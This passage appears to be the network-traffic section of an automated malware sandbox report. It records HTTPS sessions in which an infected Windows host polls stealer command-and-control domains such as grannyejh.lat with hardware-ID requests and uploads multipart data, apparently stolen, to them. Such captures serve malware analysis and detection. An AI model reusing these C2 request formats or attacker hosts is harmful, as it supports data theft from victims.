cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1679&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=944&delivery_rate=1626740&cwnd=234&unsent_bytes=0&cid=f594e01f9ae6b748&ts=13844&x=0"
2024-12-19 09:13:01 UTC	244	IN	Data Raw: 34 36 64 0d 0a 50 46 36 52 58 77 54 54 4d 44 48 6a 43 55 4a 43 38 70 78 49 37 4d 31 55 63 79 2f 4c 71 49 6c 4f 74 79 6e 69 44 79 63 67 67 33 70 48 66 4f 64 39 50 75 63 63 45 35 42 73 59 48 69 47 37 6a 32 4a 34 58 59 53 53 2b 6d 53 37 79 2f 62 57 6f 63 6a 42 56 62 75 57 41 59 34 38 44 4e 33 74 68 77 54 68 6e 46 67 65 4b 6e 6e 61 6f 6d 6a 64 6b 6b 4e 72 73 4c 72 4c 39 74 4c 67 32 52 49 55 4f 38 5a 56 44 4c 32 4e 32 47 77 56 46 43 50 5a 43 63 6e 6c 2f 30 69 67 71 51 35 47 30 4c 70 68 4b 73 72 7a 51 76 59 4c 57 70 46 39 78 74 78 50 2b 49 30 4a 71 34 63 53 73 46 73 4c 47 44 49 76 69 6d 4a 72 7a 67 56 53 36 44 41 34 53 62 54 53 6f 5a 6c 56 30 6e 6c 45 6c 51 38 39 54 5a 72 75 55 42 64 68 57 4d 73 49 5a 33 39 61 73 44 76 4d 51 6b Data Ascii: 46dPF6RXwTTMDHjCUJC8pxI7M1Ucy/LqIlOtyniDycgg3pHfOd9PuccE5BsYHiG7j2J4XYSS+mS7y/bWocjBVbuWAY48DN3thwThnFgeKnnaomjdkkNrsLrL9tLg2RIUO8ZVDL2N2GwVFCPZCcnl/0igqQ5G0LphKsrzQvYLWpF9xtxP+I0Jq4cSsFsLGDIvimJrzgVS6DA4SbTSoZlV0nlElQ89TZruUBdhWMsIZ39asDvMQk
2024-12-19 09:13:01 UTC	896	IN	Data Raw: 4e 38 59 71 34 48 74 5a 61 6b 58 68 49 55 75 64 59 51 58 4c 71 66 57 47 39 45 67 76 42 59 79 77 75 6c 66 30 6c 69 61 34 32 41 30 4b 70 79 65 4d 6b 30 55 47 50 59 6b 70 4d 36 78 39 57 4e 66 51 79 59 62 6c 55 58 49 49 72 62 6d 43 58 35 6d 72 57 37 78 59 42 54 71 72 65 35 6a 32 56 56 4d 35 30 42 55 58 74 57 41 5a 38 39 54 4e 6e 76 46 4a 42 69 57 41 72 4a 59 4c 31 49 34 4f 69 4e 68 78 48 70 73 6e 72 4b 39 39 42 6a 32 64 42 54 2b 77 65 58 6a 79 7a 63 79 61 32 53 68 50 5a 4b 77 4d 6c 67 50 6b 6d 6d 4f 30 4d 55 56 4c 6e 30 36 73 72 32 51 76 59 4c 55 31 48 34 68 74 56 4d 2f 41 31 62 61 4e 53 51 59 64 6d 4a 54 4b 57 2b 79 53 45 72 43 51 62 51 36 2f 4a 34 69 66 63 54 6f 64 70 42 51 79 68 48 30 5a 38 71 33 31 48 76 46 6c 66 69 33 77 67 59 49 2b 77 4d 38 36 6f 4f 6c Data Ascii: N8Yq4HtZakXhIUudYQXLqfWG9EgvBYywulf0lia42A0KpyeMk0UGPYkpM6x9WNfQyYblUXIIrbmCX5mrW7xYBTqre5j2VVM50BUXtWAZ89TNnvFJBiWArJYL1I4OiNhxHpsnrK99Bj2dBT+weXjyzcya2ShPZKwMlgPkmmO0MUVLn06sr2QvYLU1H4htVM/A1baNSQYdmJTKW+ySErCQbQ6/J4ifcTodpBQyhH0Z8q31HvFlfi3wgYI+wM86oOl
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 34 34 61 66 0d 0a 42 5a 62 36 64 57 6c 4e 5a 56 4d 6a 43 30 64 41 75 34 58 55 54 54 7a 50 47 4b 38 56 6c 4b 4d 5a 79 6b 6a 6e 50 49 69 67 36 4d 79 48 6b 57 68 79 65 4d 2b 32 30 57 47 61 30 56 48 6f 56 59 65 4f 2b 74 39 50 76 46 32 58 5a 5a 2f 4b 32 4b 6c 2f 53 53 41 71 43 42 52 55 75 66 54 71 79 76 5a 43 39 67 74 53 30 2f 71 46 46 6b 31 38 6a 35 6d 75 31 78 63 69 32 4d 6f 49 4a 33 2f 49 59 61 70 4f 78 70 43 70 73 33 6a 4c 39 6c 4f 6a 57 34 46 44 4b 45 66 52 6e 79 72 66 55 4f 2f 55 55 4b 51 4b 52 55 6a 6e 76 41 74 6d 4f 38 70 58 31 54 70 7a 65 64 73 6a 51 75 4b 61 6b 4a 47 37 42 4a 64 4f 50 63 77 61 62 68 62 57 70 4e 68 4c 43 36 43 38 79 43 4c 6f 54 6f 55 51 71 6e 4c 36 69 4c 66 51 4d 41 6a 42 55 58 35 57 41 5a 38 33 44 42 32 6f 31 68 59 6b 43 6b 56 49 35 Data Ascii: 44afBZb6dWlNZVMjC0dAu4XUTTzPGK8VlKMZykjnPIig6MyHkWhyeM+20WGa0VHoVYeO+t9PvF2XZZ/K2Kl/SSAqCBRUufTqyvZC9gtS0/qFFk18j5mu1xci2MoIJ3/IYapOxpCps3jL9lOjW4FDKEfRnyrfUO/UUKQKRUjnvAtmO8pX1TpzedsjQuKakJG7BJdOPcwabhbWpNhLC6C8yCLoToUQqnL6iLfQMAjBUX5WAZ83DB2o1hYkCkVI5
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 37 78 6b 53 57 36 4f 4b 39 47 4c 4d 43 34 64 68 42 52 71 68 45 6c 49 34 38 44 46 76 76 56 39 53 68 57 77 74 4a 4a 44 34 4c 49 75 75 50 52 6c 42 70 73 44 6e 4b 4e 6c 43 68 6d 46 47 51 65 64 59 45 48 7a 30 4a 53 62 70 45 6e 4b 4d 59 43 77 67 6b 2b 38 74 7a 75 46 32 48 30 75 70 69 72 4d 36 78 56 79 48 63 67 74 62 6f 52 39 53 66 4b 74 39 62 4b 4e 58 58 59 56 68 4a 53 53 63 39 43 71 4c 76 54 34 58 53 71 58 43 37 69 50 54 54 6f 31 71 54 6b 48 7a 43 6c 30 34 2f 54 45 6d 2f 78 4a 55 6d 53 74 34 59 4c 58 70 4b 5a 36 70 4e 56 46 53 35 39 4f 72 4b 39 6b 4c 32 43 31 46 54 4f 30 54 57 54 66 34 4f 57 4b 78 58 31 69 50 5a 53 6b 73 6d 50 49 74 6e 4b 49 7a 47 55 65 67 7a 2b 63 68 31 6c 6d 44 62 41 55 4d 6f 52 39 47 66 4b 74 39 51 59 4a 6c 63 4d 46 30 62 6a 6e 51 2b 53 62 Data Ascii: 7xkSW6OK9GLMC4dhBRqhElI48DFvvV9ShWwtJJD4LIuuPRlBpsDnKNlChmFGQedYEHz0JSbpEnKMYCwgk+8tzuF2H0upirM6xVyHcgtboR9SfKt9bKNXXYVhJSSc9CqLvT4XSqXC7iPTTo1qTkHzCl04/TEm/xJUmSt4YLXpKZ6pNVFS59OrK9kL2C1FTO0TWTf4OWKxX1iPZSksmPItnKIzGUegz+ch1lmDbAUMoR9GfKt9QYJlcMF0bjnQ+Sb
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 55 36 6d 77 61 73 7a 6d 31 4c 41 61 6b 6b 43 75 56 68 5a 4e 50 73 7a 5a 62 64 5a 58 34 31 71 4b 53 61 56 39 69 32 42 71 44 38 57 54 61 2f 59 37 43 48 63 53 34 74 6b 54 30 62 67 45 78 35 79 73 7a 70 2b 38 51 6f 54 73 32 77 32 4d 4a 4f 2b 4e 63 43 32 64 68 5a 42 36 5a 4b 72 49 63 64 4b 68 58 39 42 54 65 6f 4b 56 54 72 7a 4f 48 53 32 58 6c 6d 4f 61 43 67 74 6b 2f 59 34 6a 71 49 32 41 31 2b 76 77 65 56 73 6d 77 75 48 64 51 55 61 6f 53 6c 4a 4e 37 4d 69 4b 4b 67 53 56 49 30 72 65 47 43 54 39 43 65 41 76 54 49 58 52 71 72 45 34 79 6e 64 54 34 70 67 53 6b 6e 72 45 56 59 38 2f 44 68 75 75 6c 52 64 67 47 30 73 4c 64 43 77 61 6f 6d 33 64 6b 6b 4e 6a 74 44 6d 4b 73 4a 61 74 57 70 46 45 36 45 48 45 43 57 7a 4f 6d 72 78 43 68 4f 4d 5a 79 6f 74 6c 66 6f 69 69 61 77 33 Data Ascii: U6mwaszm1LAakkCuVhZNPszZbdZX41qKSaV9i2BqD8WTa/Y7CHcS4tkT0bgEx5yszp+8QoTs2w2MJO+NcC2dhZB6ZKrIcdKhX9BTeoKVTrzOHS2XlmOaCgtk/Y4jqI2A1+vweVsmwuHdQUaoSlJN7MiKKgSVI0reGCT9CeAvTIXRqrE4yndT4pgSknrEVY8/DhuulRdgG0sLdCwaom3dkkNjtDmKsJatWpFE6EHECWzOmrxChOMZyotlfoiiaw3
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 33 6e 62 49 30 4c 6a 6d 42 44 51 2b 41 51 56 6a 7a 31 4e 32 4b 79 57 31 43 47 59 69 59 72 6b 2f 51 6c 69 61 6b 79 45 55 61 75 78 4f 30 70 33 6b 4c 41 49 77 56 46 2b 56 67 47 66 4e 55 65 64 4b 4e 67 58 59 4a 77 59 44 2f 65 35 32 71 4a 6f 33 5a 4a 44 61 4c 43 35 44 37 51 51 6f 68 70 54 45 4c 6c 45 6c 4d 37 38 7a 68 72 74 46 5a 64 68 57 77 67 4c 4a 2f 35 49 6f 47 72 4e 68 34 4e 35 34 72 73 4e 4a 55 54 77 45 31 4f 56 4d 41 57 56 53 36 7a 49 69 69 6f 45 6c 53 4e 4b 33 68 67 6e 76 63 72 68 71 45 36 47 55 6d 37 79 75 41 6c 32 6b 71 50 62 55 5a 44 36 78 42 4d 4f 76 4d 32 62 72 5a 61 56 34 39 35 49 53 2f 51 73 47 71 4a 74 33 5a 4a 44 5a 6a 63 37 43 76 61 43 61 6c 71 58 6b 50 72 47 31 55 77 73 79 49 6f 71 42 4a 55 6a 53 74 34 59 4a 33 79 4a 34 71 39 4f 68 46 4e 6f Data Ascii: 3nbI0LjmBDQ+AQVjz1N2KyW1CGYiYrk/QliakyEUauxO0p3kLAIwVF+VgGfNUedKNgXYJwYD/e52qJo3ZJDaLC5D7QQohpTELlElM78zhrtFZdhWwgLJ/5IoGrNh4N54rsNJUTwE1OVMAWVS6zIiioElSNK3hgnvcrhqE6GUm7yuAl2kqPbUZD6xBMOvM2brZaV495IS/QsGqJt3ZJDZjc7CvaCalqXkPrG1UwsyIoqBJUjSt4YJ3yJ4q9OhFNo
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 65 52 59 56 73 53 55 6a 6d 46 6b 77 39 2b 54 46 6e 74 6c 56 59 6b 32 41 79 4b 35 6a 39 4a 49 61 6d 4e 68 39 4e 71 4d 66 72 62 4a 73 4c 68 33 55 46 47 71 45 39 66 53 76 6c 4e 79 53 53 52 55 57 4c 62 43 77 32 6d 2f 38 70 6d 4b 49 6d 55 51 50 70 32 2b 77 39 6c 52 4f 57 66 56 4a 46 2f 6c 5a 48 66 50 51 78 4a 75 6b 53 57 49 35 6c 4c 53 75 55 39 79 2b 47 72 44 4d 55 52 36 58 47 36 69 54 63 51 59 56 6f 51 30 6a 69 46 6c 45 39 2f 7a 6c 76 76 31 73 54 7a 79 73 6e 4f 4e 43 6d 61 72 69 2f 4d 51 6c 41 75 59 6a 5a 4c 38 52 61 6c 57 42 56 52 4b 4d 33 58 54 44 77 4f 47 47 68 45 6b 7a 50 63 6d 41 6e 6e 4c 35 79 7a 71 38 79 48 55 36 75 78 4f 51 68 32 6b 79 4c 59 6b 39 4d 38 78 64 62 4e 50 38 31 61 36 4e 59 57 5a 4e 69 4b 53 32 65 39 6a 69 4e 37 33 68 52 53 72 47 4b 73 32 Data Ascii: eRYVsSUjmFkw9+TFntlVYk2AyK5j9JIamNh9NqMfrbJsLh3UFGqE9fSvlNySSRUWLbCw2m/8pmKImUQPp2+w9lROWfVJF/lZHfPQxJukSWI5lLSuU9y+GrDMUR6XG6iTcQYVoQ0jiFlE9/zlvv1sTzysnONCmari/MQlAuYjZL8RalWBVRKM3XTDwOGGhEkzPcmAnnL5yzq8yHU6uxOQh2kyLYk9M8xdbNP81a6NYWZNiKS2e9jiN73hRSrGKs2
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 58 46 4e 50 38 52 74 62 4f 38 30 44 61 4c 5a 47 56 49 39 74 49 47 44 65 76 69 58 4f 39 77 39 52 42 65 6e 31 70 57 7a 4e 43 39 67 74 63 45 48 76 46 6c 6b 71 34 6e 42 46 70 6b 52 5a 6d 69 6b 47 4a 34 48 33 50 49 4f 39 64 6c 38 4e 72 34 71 7a 66 4a 73 4c 68 48 77 46 47 72 46 4b 42 57 6d 67 61 6a 62 6a 54 52 32 59 4b 7a 5a 67 79 4b 78 6b 7a 72 31 32 53 51 33 75 79 66 6b 2b 30 30 69 57 62 67 4a 38 33 7a 68 56 4b 76 49 77 62 62 31 73 62 5a 52 6f 4c 69 36 58 36 44 76 4f 34 58 59 65 44 66 48 7a 71 32 53 56 64 4d 34 74 58 51 4b 35 57 47 73 2f 2f 54 4e 68 70 30 4d 65 6f 57 41 32 49 5a 33 31 4a 73 79 75 4f 77 46 4b 36 59 53 72 4b 70 55 54 30 43 4d 46 52 76 42 59 42 6d 79 68 5a 6a 50 69 42 51 50 54 64 47 34 35 30 4f 68 71 31 76 31 34 55 56 2f 70 6b 71 74 72 31 6c 6d Data Ascii: XFNP8RtbO80DaLZGVI9tIGDeviXO9w9RBen1pWzNC9gtcEHvFlkq4nBFpkRZmikGJ4H3PIO9dl8Nr4qzfJsLhHwFGrFKBWmgajbjTR2YKzZgyKxkzr12SQ3uyfk+00iWbgJ83zhVKvIwbb1sbZRoLi6X6DvO4XYeDfHzq2SVdM4tXQK5WGs//TNhp0MeoWA2IZ31JsyuOwFK6YSrKpUT0CMFRvBYBmyhZjPiBQPTdG450Ohq1v14UV/pkqtr1lm
2024-12-19 09:13:01 UTC	1369	IN	Data Raw: 2b 49 59 56 58 79 39 66 57 44 78 43 67 48 50 4b 79 51 78 30 4b 5a 36 33 50 52 6a 51 68 72 35 6d 50 52 69 7a 41 75 57 4c 52 30 51 72 31 68 4d 66 4b 74 39 49 62 4a 41 51 59 64 6f 4e 69 50 58 77 42 53 6f 72 44 45 58 54 71 66 64 2b 6d 37 36 53 49 74 68 53 55 58 33 4a 6d 41 70 38 44 4e 6f 74 6b 52 43 77 53 56 67 4c 39 43 6d 45 38 36 2b 50 42 59 42 34 59 62 36 50 39 74 41 6c 6d 6f 46 66 61 39 59 52 6e 79 72 66 56 4f 79 58 46 32 47 66 54 46 74 74 76 30 74 69 4b 77 34 42 6c 7a 70 68 4b 73 71 6c 52 50 53 49 77 56 47 38 46 67 47 62 4b 46 6d 4d 2b 49 46 41 39 4e 30 62 6a 6e 51 36 47 72 57 2f 48 68 52 58 2b 6d 53 71 32 76 62 52 6f 46 75 53 30 48 7a 43 6c 67 2f 35 54 34 68 6a 32 78 32 6a 47 59 6c 4c 70 66 41 46 4b 2b 6c 4a 68 78 43 72 76 54 56 47 38 52 4d 6b 43 39 6a Data Ascii: +IYVXy9fWDxCgHPKyQx0KZ63PRjQhr5mPRizAuWLR0Qr1hMfKt9IbJAQYdoNiPXwBSorDEXTqfd+m76SIthSUX3JmAp8DNotkRCwSVgL9CmE86+PBYB4Yb6P9tAlmoFfa9YRnyrfVOyXF2GfTFttv0tiKw4BlzphKsqlRPSIwVG8FgGbKFmM+IFA9N0bjnQ6GrW/HhRX+mSq2vbRoFuS0HzClg/5T4hj2x2jGYlLpfAFK+lJhxCrvTVG8RMkC9j

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	50251	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:54 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: lossekniyyt.click
2024-12-19 09:12:54 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 39 5a 31 63 79 63 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=9Z1cyc--&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:13:08 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=18491ovg887ncoavvokekghmdv; expires=Mon, 14 Apr 2025 02:59:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JEvAan9Mj5FB7k5l12ukg0hslc8dQJmHVg6JPEFYjNWPAksWLIIEtocQIStk92ho0RYywkN%2FYduO2zPWr5f5Y7QRhmjb8GF5rOuaQMMBwQNzN4zoIy6C83jjrwljzdgyoHbxuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46460b5c094356-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1688&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=978&delivery_rate=1729857&cwnd=237&unsent_bytes=0&cid=2f14876157721c29&ts=14823&x=0"
2024-12-19 09:13:08 UTC	54	IN	Data Raw: 33 30 0d 0a 6c 79 5a 53 6c 32 69 4d 38 33 42 73 42 6b 46 32 45 4d 39 4e 4b 41 53 57 45 2f 51 34 33 51 38 65 4a 34 4b 42 72 2b 55 76 4c 79 4c 4d 65 77 3d 3d 0d 0a Data Ascii: 30lyZSl2iM83BsBkF2EM9NKASWE/Q43Q8eJ4KBr+UvLyLMew==
2024-12-19 09:13:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	50256	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:56 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HBZCXCRA81H1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19922 Host: cheapptaxysu.click
2024-12-19 09:12:56 UTC	15331	OUT	Data Raw: 2d 2d 48 42 5a 43 58 43 52 41 38 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 42 5a 43 58 43 52 41 38 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 42 5a 43 58 43 52 41 38 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 48 42 5a 43 58 43 52 41 38 31 48 31 0d 0a 43 6f 6e 74 65 Data Ascii: --HBZCXCRA81H1Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--HBZCXCRA81H1Content-Disposition: form-data; name="pid"3--HBZCXCRA81H1Content-Disposition: form-data; name="lid"CZJvss----HBZCXCRA81H1Conte
2024-12-19 09:12:56 UTC	4591	OUT	Data Raw: 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ?2+?2+?o?Mp5p_oI
2024-12-19 09:13:09 UTC	1145	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fdpn4s3fmv931etd7h44l2js0c; expires=Mon, 14 Apr 2025 02:59:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDOZ9fuIT%2BFlvit7u21TOAxqx%2BEsi5JpWY%2B96b%2BJEcCarmNX%2F1Vd9xlx0MCloFZMRRxXLJSmNn3bzeE6vkv%2FJAB%2F0iQTajymT7%2FANMQA0I6HsiJJ%2BoySHzntpdsjewquymC2qI8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464617dc708c6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2002&rtt_var=761&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20880&delivery_rate=1427872&cwnd=144&unsent_bytes=0&cid=58420854deb6de2c&ts=13528&x=0"
2024-12-19 09:13:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.6	50260	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:57 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DQ1S79DFE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19914 Host: grannyejh.lat
2024-12-19 09:12:57 UTC	15331	OUT	Data Raw: 2d 2d 44 51 31 53 37 39 44 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 44 51 31 53 37 39 44 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 51 31 53 37 39 44 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 44 51 31 53 37 39 44 46 45 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --DQ1S79DFEContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA300D57F9DDD37BE0C--DQ1S79DFEContent-Disposition: form-data; name="pid"3--DQ1S79DFEContent-Disposition: form-data; name="lid"yau6Na--6989783370--DQ1S79DFEContent
2024-12-19 09:12:57 UTC	4583	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf Data Ascii: 2+?2+?o?Mp5p_oI
2024-12-19 09:13:11 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3opghe9lmuakmnk745v4ctr5k4; expires=Mon, 14 Apr 2025 02:59:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2sE%2FK4YGhG3j2m6u9M9El6PfqFRO8LYyrMWjUVlYiFrpv1LYKYNBhjHJhoRqDrOekj%2Bp330UzLRj93WXLI9p7ZrTjqCk4rmbA2my3BxKVdfF5XRI0m9pPAPaDQM3usG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464620d91befa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1770&rtt_var=740&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20864&delivery_rate=1405197&cwnd=194&unsent_bytes=0&cid=4ca9e306fdef763f&ts=13788&x=0"
2024-12-19 09:13:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	50262	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:02 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: grannyejh.lat
2024-12-19 09:13:02 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
